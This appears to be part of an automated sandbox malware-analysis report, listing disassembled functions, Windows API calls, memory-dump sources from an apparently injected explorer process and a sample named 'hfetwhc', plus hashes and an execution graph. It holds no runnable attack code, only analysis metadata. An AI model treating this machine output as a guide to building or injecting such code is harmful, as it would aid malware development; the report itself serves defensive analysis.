                                                                                                                                      • Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3192549508-0
                                                                                                                                      • Opcode ID: 8b50865986c9b91c66cd4b5f2758ccaa53f308c1ea2bd12acc4538cda5f11be2
                                                                                                                                      • Instruction ID: c92bda5a1441018751ee9f98f4aef0a08a4fe23968262274f52dae9f80d48322
                                                                                                                                      • Opcode Fuzzy Hash: 8b50865986c9b91c66cd4b5f2758ccaa53f308c1ea2bd12acc4538cda5f11be2
                                                                                                                                      • Instruction Fuzzy Hash: 92B09231047208FBCB003B91FC09B587FA9FB06652F408010FE0D45055CB7654208AE2
                                                                                                                                      Function 030C7F26 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 84COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • RtlDecodePointer.NTDLL ref: 030C7F2E
                                                                                                                                      • _free.LIBCMT ref: 030C7F47
                                                                                                                                        • Part of subcall function 030C88FA: RtlFreeHeap.NTDLL(00000000,00000000,?,030C7CD5,00000000,00010108,0000000B,?,00000000,033D3FE8), ref: 030C890E
                                                                                                                                        • Part of subcall function 030C88FA: GetLastError.KERNEL32(00000000,?,030C7CD5,00000000,00010108,0000000B,?,00000000,033D3FE8), ref: 030C8920
                                                                                                                                      • _free.LIBCMT ref: 030C7F5A
                                                                                                                                      • _free.LIBCMT ref: 030C7F78
                                                                                                                                      • _free.LIBCMT ref: 030C7F8A
                                                                                                                                      • _free.LIBCMT ref: 030C7F9B
                                                                                                                                      • _free.LIBCMT ref: 030C7FA6
                                                                                                                                      • _free.LIBCMT ref: 030C7FCA
                                                                                                                                      • RtlEncodePointer.NTDLL(033DCB30), ref: 030C7FD1
                                                                                                                                      • _free.LIBCMT ref: 030C7FE6
                                                                                                                                      • _free.LIBCMT ref: 030C7FFC
                                                                                                                                      • _free.LIBCMT ref: 030C8024
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                                                                                                                                      • String ID: PNEw
                                                                                                                                      • API String ID: 3064303923-3542233003
                                                                                                                                      • Opcode ID: 0b5256638aced71a7a92f897f68db886f444f2d7ea4ccd29144a585226c12434
                                                                                                                                      • Instruction ID: 857e697909880c2c915404992e40d57cbc2fd163019f32e51a487ba3a5508f8d
                                                                                                                                      • Opcode Fuzzy Hash: 0b5256638aced71a7a92f897f68db886f444f2d7ea4ccd29144a585226c12434
                                                                                                                                      • Instruction Fuzzy Hash: 1C214C39A133A1CBD760FF6CF88055DB7E4BB45B34718813DED059A288CA3C5855CA88
                                                                                                                                      Function 030C7E2A Relevance: 15.1, APIs: 10, Instructions: 75COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • ___crtIsPackagedApp.LIBCMT ref: 030C7E54
                                                                                                                                      • AreFileApisANSI.KERNEL32(?,00000109,00000000,?,030D3675,00000008,00000000,00000000,?,030D360C,?,?,?,?,00000008,?), ref: 030C7E5D
                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,00000109,00000000,?,030D3675,00000008,00000000,00000000,?,030D360C), ref: 030C7E77
                                                                                                                                      • GetLastError.KERNEL32(?,030D3675,00000008,00000000,00000000,?,030D360C,?,?,?,?,00000008,?,00000000,030DBFD0,00000014), ref: 030C7E84
                                                                                                                                      • __dosmaperr.LIBCMT ref: 030C7E8B
                                                                                                                                        • Part of subcall function 030C92F0: __getptd_noexit.LIBCMT ref: 030C92F0
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ApisByteCharErrorFileLastMultiPackagedWide___crt__dosmaperr__getptd_noexit
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1083238821-0
                                                                                                                                      • Opcode ID: a160398963f2fb27c428f82393a86234ae070e243b912451b9d0a74b88cc9e47
                                                                                                                                      • Instruction ID: 0922fc10d3747bb04df9fc623f81c06fb3cbacdcc7f11483d84400d62203d1ec
                                                                                                                                      • Opcode Fuzzy Hash: a160398963f2fb27c428f82393a86234ae070e243b912451b9d0a74b88cc9e47
                                                                                                                                      • Instruction Fuzzy Hash: 691193B7527345AFEB60BFB09C44BBE7ADCEF19B61B14452CFD51C9180EB3488008AA4
                                                                                                                                      Function 030C7D97 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • __init_pointers.LIBCMT ref: 030C7D97
                                                                                                                                        • Part of subcall function 030C80F6: RtlEncodePointer.NTDLL(00000000), ref: 030C80F9
                                                                                                                                        • Part of subcall function 030C80F6: __initp_misc_winsig.LIBCMT ref: 030C8114
                                                                                                                                        • Part of subcall function 030C80F6: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 030C8B4E
                                                                                                                                        • Part of subcall function 030C80F6: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 030C8B62
                                                                                                                                        • Part of subcall function 030C80F6: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 030C8B75
                                                                                                                                        • Part of subcall function 030C80F6: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 030C8B88
                                                                                                                                        • Part of subcall function 030C80F6: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 030C8B9B
                                                                                                                                        • Part of subcall function 030C80F6: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 030C8BAE
                                                                                                                                        • Part of subcall function 030C80F6: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 030C8BC1
                                                                                                                                        • Part of subcall function 030C80F6: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 030C8BD4
                                                                                                                                        • Part of subcall function 030C80F6: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 030C8BE7
                                                                                                                                        • Part of subcall function 030C80F6: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 030C8BFA
                                                                                                                                        • Part of subcall function 030C80F6: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 030C8C0D
                                                                                                                                        • Part of subcall function 030C80F6: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 030C8C20
                                                                                                                                        • Part of subcall function 030C80F6: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 030C8C33
                                                                                                                                        • Part of subcall function 030C80F6: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 030C8C46
                                                                                                                                        • Part of subcall function 030C80F6: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 030C8C59
                                                                                                                                        • Part of subcall function 030C80F6: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 030C8C6C
                                                                                                                                      • __mtinitlocks.LIBCMT ref: 030C7D9C
                                                                                                                                      • __mtterm.LIBCMT ref: 030C7DA5
                                                                                                                                        • Part of subcall function 030C7E0D: RtlDeleteCriticalSection.NTDLL ref: 030CA179
                                                                                                                                        • Part of subcall function 030C7E0D: _free.LIBCMT ref: 030CA180
                                                                                                                                        • Part of subcall function 030C7E0D: RtlDeleteCriticalSection.NTDLL(030DD918), ref: 030CA1A2
                                                                                                                                      • __calloc_crt.LIBCMT ref: 030C7DCA
                                                                                                                                      • __initptd.LIBCMT ref: 030C7DEC
                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 030C7DF3
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3567560977-0
                                                                                                                                      • Opcode ID: 065757ef35320ef7a3fbf064ea7a1d9b582c0545e03b4476e702c53d67ee4036
                                                                                                                                      • Instruction ID: 94f932aad60390cdc398f06ae362733f78afaad5acd76973952c6bea6e9f93b1
                                                                                                                                      • Opcode Fuzzy Hash: 065757ef35320ef7a3fbf064ea7a1d9b582c0545e03b4476e702c53d67ee4036
                                                                                                                                      • Instruction Fuzzy Hash: C9F0903613B7A12EE275FB747C0679E2AD4AF82A30F248A5DE874DC0C4FF9188525994
                                                                                                                                      Function 030C3837 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _free_mallocwcsncpy
                                                                                                                                      • String ID: .z%02d
                                                                                                                                      • API String ID: 3842812274-724465191
                                                                                                                                      • Opcode ID: 8dd9135576874e06e7e13132c04a4564ec4d80440b7b8302cebb9ca6862fbb39
                                                                                                                                      • Instruction ID: 0047c6559c15addc469e9e7b93ec271e440d60c97c714b2cd74eb9a38781962a
                                                                                                                                      • Opcode Fuzzy Hash: 8dd9135576874e06e7e13132c04a4564ec4d80440b7b8302cebb9ca6862fbb39
                                                                                                                                      • Instruction Fuzzy Hash: E311C639932359ABDB10DF58DC44EBFB7A8FB45720B44819DFD029B100D779A91886F4
                                                                                                                                      Function 030C3C0F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54stringCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _free_mallocstrncpy
                                                                                                                                      • String ID: .z%02u
                                                                                                                                      • API String ID: 854628082-1100895957
                                                                                                                                      • Opcode ID: 2dee296a4d131c82c3840ae1576a0d1a0ddccac591fde9801053666fb7124599
                                                                                                                                      • Instruction ID: 89f2914cc2dac389c0b12c02ff66fedede1797ae7b55e2ead308b6e2fcd35f0f
                                                                                                                                      • Opcode Fuzzy Hash: 2dee296a4d131c82c3840ae1576a0d1a0ddccac591fde9801053666fb7124599
                                                                                                                                      • Instruction Fuzzy Hash: 6C01D239633794ABCB21EB588CC4D7FBBA8EF81B10700885DFD5256100D72AAC2097A0
                                                                                                                                      Function 030C503B Relevance: 7.8, APIs: 5, Instructions: 295COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _memmove
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 4104443479-0
                                                                                                                                      • Opcode ID: 3d6da900721ff391acd5c083a86e787545dccce05d95e6edb57348700f079d13
                                                                                                                                      • Instruction ID: be5b4b49b5b6224d7001fe55fd798e76c90c757cc05c1a6dd6d51cb46f77fafc
                                                                                                                                      • Opcode Fuzzy Hash: 3d6da900721ff391acd5c083a86e787545dccce05d95e6edb57348700f079d13
                                                                                                                                      • Instruction Fuzzy Hash: 76B14579611B808FC764CF6EC8C496AB7E5FF8A304B28892DE48ACB650D771F845CB54
                                                                                                                                      Function 030D218A Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1559183368-0
                                                                                                                                      • Opcode ID: d4eb1a777f878832786e557e6d3bf7cead3d85c675fbd5e9f08223bff75cf05c
                                                                                                                                      • Instruction ID: 6e5d1fbc5b420d758d5f3ca2e41b77ff99ae86e23652c6394f929ed8b424e395
                                                                                                                                      • Opcode Fuzzy Hash: d4eb1a777f878832786e557e6d3bf7cead3d85c675fbd5e9f08223bff75cf05c
                                                                                                                                      • Instruction Fuzzy Hash: 4E51C534A02709EBDB64CFA9C8806AEB7F9AF50320F188F6DF875966D0D770D9508B54
                                                                                                                                      Function 030CAECD Relevance: 7.6, APIs: 5, Instructions: 67COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _malloc.LIBCMT ref: 030CAED9
                                                                                                                                        • Part of subcall function 030CAE3B: __FF_MSGBANNER.LIBCMT ref: 030CAE52
                                                                                                                                        • Part of subcall function 030CAE3B: __NMSG_WRITE.LIBCMT ref: 030CAE59
                                                                                                                                        • Part of subcall function 030CAE3B: RtlAllocateHeap.NTDLL(033D0000,00000000,00000001), ref: 030CAE7E
                                                                                                                                      • _free.LIBCMT ref: 030CAEEC
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocateHeap_free_malloc
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1020059152-0
                                                                                                                                      • Opcode ID: 00c4cece77a466259ff7eacc0f13c0fe4d7aec4be041a57e95e48a661fde04d1
                                                                                                                                      • Instruction ID: ba2de7c126e4989046ed84d11cec5e369d93dd060b002c7628053eb4f828d7d5
                                                                                                                                      • Opcode Fuzzy Hash: 00c4cece77a466259ff7eacc0f13c0fe4d7aec4be041a57e95e48a661fde04d1
                                                                                                                                      • Instruction Fuzzy Hash: 6511E376A2739AEFCB60BBF8AC4479F77E8AF443A0B04456DED458E140DB38844182D0
                                                                                                                                      Function 030D2421 Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2782032738-0
                                                                                                                                      • Opcode ID: ea1406190fb9796f8190687ce42510bdf285d238db1f3e4e6202fb1ce1078a14
                                                                                                                                      • Instruction ID: 8b08dbaee0c2a09905ead50593554b526234c3832fe49502bf7e6fe955940440
                                                                                                                                      • Opcode Fuzzy Hash: ea1406190fb9796f8190687ce42510bdf285d238db1f3e4e6202fb1ce1078a14
                                                                                                                                      • Instruction Fuzzy Hash: 0541F8357027069FDB68CF68C8909AEB7EDAF84360B18897DEC55CBA84D770D9418B50
                                                                                                                                      Function 030D177C Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 030D17B2
                                                                                                                                      • __isleadbyte_l.LIBCMT ref: 030D17E0
                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000009,00000108,?,00000000,00000000), ref: 030D180E
                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000009,00000108,00000001,00000000,00000000), ref: 030D1844
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3058430110-0
                                                                                                                                      • Opcode ID: 95f756abe7d0225c7b99a6fb68a2a7fddbbdc1d6e32f598186423e19010bacdf
                                                                                                                                      • Instruction ID: 748a5899f439930b193d954b07a573a155cc449936c9eacffc4699345ff1b940
                                                                                                                                      • Opcode Fuzzy Hash: 95f756abe7d0225c7b99a6fb68a2a7fddbbdc1d6e32f598186423e19010bacdf
                                                                                                                                      • Instruction Fuzzy Hash: 0031A135A06346AFDBA9DF65D844BAFBBFAFF41310F194458E8148B1A0DB34D851CB90
                                                                                                                                      Function 030CD676 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3016257755-0
                                                                                                                                      • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                                                      • Instruction ID: 832113f0283a254de7472c85e48e3cfc87f674a1d8cc89787979fe36e60de41c
                                                                                                                                      • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                                                      • Instruction Fuzzy Hash: E101483642118ABBCF12AF94DC418EE7F76BB58294F488429FA5858130D737C5B1EB81
                                                                                                                                      Function 030C3B7A Relevance: 6.0, APIs: 4, Instructions: 30stringCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _malloc$_strlenstrncpy
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 4159901624-0
                                                                                                                                      • Opcode ID: 1b0986be71260d84b4b40ec7ceea7b08610f6ec4acb85f2d008c600932a552e5
                                                                                                                                      • Instruction ID: 632a8a4c588ef403068808cb63e160cbdec236db9790c4fcf3a4912aaad2859f
                                                                                                                                      • Opcode Fuzzy Hash: 1b0986be71260d84b4b40ec7ceea7b08610f6ec4acb85f2d008c600932a552e5
                                                                                                                                      • Instruction Fuzzy Hash: 30E0D8B9B336627BC710BB6D5C44D9FA69CDFC92513458469FA09D7200C7244C1643F0
                                                                                                                                      Function 030C9256 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DecodePointer__invoke_watson
                                                                                                                                      • String ID: PNEw
                                                                                                                                      • API String ID: 4034010525-3542233003
                                                                                                                                      • Opcode ID: 58d5912e386f2c5f32d82bc5a4281f116e48b69a240d7b1a458492be9a5aea7e
                                                                                                                                      • Instruction ID: c327e0bb4d30f21b4bfcc2b4303a611cff51bd805ec5017b6584ff9b0fd29f5f
                                                                                                                                      • Opcode Fuzzy Hash: 58d5912e386f2c5f32d82bc5a4281f116e48b69a240d7b1a458492be9a5aea7e
                                                                                                                                      • Instruction Fuzzy Hash: D5E0EC36412249BBCF416F61DC058AE3FA9FF44750B454414FE5088420D736C930DB95

                                                                                                                                      Execution Graph

                                                                                                                                      Execution Coverage:1.2%
                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                      Signature Coverage:0%
                                                                                                                                      Total number of Nodes:19
                                                                                                                                      Total number of Limit Nodes:1
                                                                                                                                      execution_graph 982 402919 983 40291d 982->983 984 4029e5 LdrLoadDll 983->984 985 4029f5 984->985 994 4029b9 995 4029da LdrLoadDll 994->995 997 4029f5 995->997 969 402d5a 973 402988 969->973 971 402d56 971->969 972 402d72 971->972 974 40298f 973->974 975 4029e5 LdrLoadDll 974->975 976 4029f5 975->976 976->971 977 40290a 979 4028ef 977->979 978 402952 979->977 979->978 980 4029e5 LdrLoadDll 979->980 981 4029f5 980->981

                                                                                                                                      Executed Functions

                                                                                                                                      Function 0040290A Relevance: 1.6, APIs: 1, Instructions: 103libraryloaderCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 0 40290a-40290e 1 402910-402911 0->1 2 40298f-4029e1 call 401232 0->2 3 402913 1->3 4 40292c 1->4 25 4029e5-4029f3 LdrLoadDll 2->25 7 402914 3->7 8 40292e-402949 4->8 9 4028ef-4028f2 4->9 7->4 10 40294b-402950 8->10 12 4028f4-402906 9->12 13 40296d-40296e 9->13 10->7 17 402952-402954 10->17 14 402981-402985 12->14 15 402908 12->15 15->0 15->10 17->13 26 4029f5 25->26 27 4029fc-402a49 call 401232 25->27 26->27
                                                                                                                                      APIs
                                                                                                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004029EE
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000010.00000002.3927540281.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000010.00000002.3927368040.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000010.00000002.3927694935.0000000000404000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_16_2_400000_hfetwhc.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Load
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2234796835-0
                                                                                                                                      • Opcode ID: 94b9ecdda93e7a03f1b91e0d7552df6efdbadd54ccb0ddbcfaeec834152aa81f
                                                                                                                                      • Instruction ID: 0f37f1e8340a455a628f0dd2c8bfe38ab1bb1e89a3f0909cb6302f7b9a388a1b
                                                                                                                                      • Opcode Fuzzy Hash: 94b9ecdda93e7a03f1b91e0d7552df6efdbadd54ccb0ddbcfaeec834152aa81f
                                                                                                                                      • Instruction Fuzzy Hash: 8C3135B2708204DBC7229A74CB0C6657360FF61368F34817BE482BA0C1D5BD6647AF6B
                                                                                                                                      Function 00402919 Relevance: 1.6, APIs: 1, Instructions: 60libraryloaderCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 39 402919-40291b 40 402996-4029aa 39->40 41 40291d 39->41 44 4029b2-4029e1 call 401232 40->44 45 4029bb 40->45 42 402962 41->42 43 40291f-402925 41->43 42->40 43->42 52 4029e5-4029f3 LdrLoadDll 44->52 45->44 53 4029f5 52->53 54 4029fc-402a49 call 401232 52->54 53->54
                                                                                                                                      APIs
                                                                                                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004029EE
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000010.00000002.3927540281.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000010.00000002.3927368040.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000010.00000002.3927694935.0000000000404000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_16_2_400000_hfetwhc.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Load
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2234796835-0
                                                                                                                                      • Opcode ID: 8076e47548ac09e5e7daeb9ea87f2321c4e851a486b438aa05f0ead927cd1cb5
                                                                                                                                      • Instruction ID: 94162d520a03f6ebd08e1c1ad236a80b0b30f03ccf8e8ecf9357496de1815f78
                                                                                                                                      • Opcode Fuzzy Hash: 8076e47548ac09e5e7daeb9ea87f2321c4e851a486b438aa05f0ead927cd1cb5
                                                                                                                                      • Instruction Fuzzy Hash: 88113271708100E7CB209A548B4CBAA3320EB50320F2080B7E942BA1C1C9FC9A03BF6F
                                                                                                                                      Function 00402988 Relevance: 1.6, APIs: 1, Instructions: 60libraryloaderCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 66 402988-4029f3 call 401232 LdrLoadDll 80 4029f5 66->80 81 4029fc-402a49 call 401232 66->81 80->81
                                                                                                                                      APIs
                                                                                                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004029EE
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000010.00000002.3927540281.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000010.00000002.3927368040.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000010.00000002.3927694935.0000000000404000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_16_2_400000_hfetwhc.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Load
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2234796835-0
                                                                                                                                      • Opcode ID: 1116fd35f8b690966260491feb7ff7e4415ced47bcc92838e410c90d1b3601aa
                                                                                                                                      • Instruction ID: fa554d0c34519f5cd6b82b57aba43f03ca34593ce70611dbcf9765f41090c4dd
                                                                                                                                      • Opcode Fuzzy Hash: 1116fd35f8b690966260491feb7ff7e4415ced47bcc92838e410c90d1b3601aa
                                                                                                                                      • Instruction Fuzzy Hash: BA11EDB0708204E7D620AA449B4DB6A3324AB51714F308077B9837A1C1D9FC9A07BBAF
                                                                                                                                      Function 00402993 Relevance: 1.6, APIs: 1, Instructions: 54libraryloaderCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 93 402993-4029aa 94 4029b2-4029e1 call 401232 93->94 95 4029bb 93->95 102 4029e5-4029f3 LdrLoadDll 94->102 95->94 103 4029f5 102->103 104 4029fc-402a49 call 401232 102->104 103->104
                                                                                                                                      APIs
                                                                                                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004029EE
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000010.00000002.3927540281.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000010.00000002.3927368040.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000010.00000002.3927694935.0000000000404000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
